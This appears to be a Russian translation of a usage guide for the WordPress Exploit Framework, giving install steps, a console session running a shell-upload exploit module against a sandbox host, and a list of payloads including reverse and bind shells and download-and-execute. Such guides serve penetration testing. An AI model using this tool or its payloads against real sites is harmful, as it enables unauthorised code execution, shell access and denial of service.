Скачать wordpress-exploit-framework
Требования
Убедитесь в том, что на вашей системе установлен Ruby 2.2.x, и после установите все необходимые зависимости с помощью открытия командной строки/терминала в директории WPXF и выполнения команды bundle install
Если bundler отсутствует в вашей системе, вы можете установить его, запустив gem install bundler
Убедитесь, что у вас есть все инструменты, необходимые для компиляции C расширения:
Код:
sudo apt-get install build-essential patch
Код:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev
Откройте командную строку/терминал в директории, в которую вы загрузили WordPress Exploit Framework, и запустите его с помощью выполнения команды ruby wpxf.rb
После загрузки вам будет предложена подсказка wpxf, в которой вы можете искать модули с помощью команды search или загружать модуль с помощью команды command use. Загрузка модуля в вашу среду позволит вам установить опции с помощью команды set, и посмотреть информацию о модуле, используя команду infoНиже приведен пример того, как следует загружать symposium_shell_upload эксплойт модуль, настраивать опции модуля и пейлоад, а также запускать эксплойт против определенной цели.
Код:
wpxf > use exploit/symposium_shell_upload
[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>
wpxf [exploit/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/
wpxf [exploit/symposium_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::payloads::Exec:0x434d078>
wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
Вспомогательные модули не позволяют вам запускать пейлоады на целевой машине, но вместо этого они позволяют извлекать информацию из цели, повышать привилегии или предоставлять функции отказа в обслуживании.
Эксплойт модули требуют от вас указать пейлоад, который впоследствии будет извлечен на целевой машине, позволяя вам запускать произвольный код для извлечения информации из машины, устанавливать удаленную оболочку или что-либо еще, что вы хотите сделать в контексте веб-сервера.
Какие пейлоады доступны?
- bind_php: загружает скрипт, который будет привязываться к определенному порту, и разрешает WPXF устанавливать удаленную оболочку.
- custom: загружает и выполняет пользовательский PHP скрипт.
- download_exec: загружает и запускает удаленный исполняемый файл..
- exec: запускает команду оболочки на удаленном сервере и возвращает результат в сеанс WPXF.
- reverse_tcp: загружает скрипт, который установит обратную TCP-оболочку.
Перевод: Анна Давыдова
Источник:
Ссылка скрыта от гостей